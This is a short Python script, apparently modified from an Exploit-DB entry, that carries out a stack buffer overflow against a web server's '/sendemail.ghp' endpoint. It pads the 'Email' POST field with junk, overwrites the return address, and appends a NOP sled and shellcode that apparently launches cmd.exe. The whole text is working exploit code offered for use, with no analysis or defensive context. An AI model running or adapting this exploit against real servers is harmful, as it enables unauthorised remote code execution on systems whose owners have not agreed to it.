Original code: https://www.exploit-db.com/exploits/42165/
Modified.
#!/usr/bin/env python import httplib ################################## shellcode = ("\x8b\xec\x55\x8b\xec\x68\x65\x78\x65" "\x2F\x68\x63\x6d\x64\x2e\x8d\x45\xf8" "\x50\xb8\xc7\x93\xc2\x77\xff\xd0") junk = "A" * 4072 esp = "\xD4\x71\xAE\x01" nop = "\x90" * 12 bof = junk + esp + nop + shellcode; httpServ = httplib.HTTPConnection("192.168.136.129", 80) httpServ.connect() httpServ.request('POST', '/sendemail.ghp', 'Email=%s&getPassword=Get+Password' % bof) response = httpServ.getresponse() httpServ.close()